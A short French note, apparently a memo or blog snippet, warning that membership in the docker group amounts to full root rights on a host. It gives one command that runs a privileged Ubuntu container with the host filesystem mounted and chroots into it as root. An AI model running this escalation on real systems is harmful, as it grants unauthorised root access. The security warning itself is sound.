Les dangers du groupe docker

Si un utilisateur a le groupe docker alors il a tous les droits sur la machine. il peut utiliser un container du genre alpine ou ubuntu pour remonter le système en mode root

docker run --rm -it -u root --privileged -v /:/mnt -v /var:/mnt/var -v /home/:/mnt/home ubuntu:22.04 chroot /mnt /bin/bash

Source: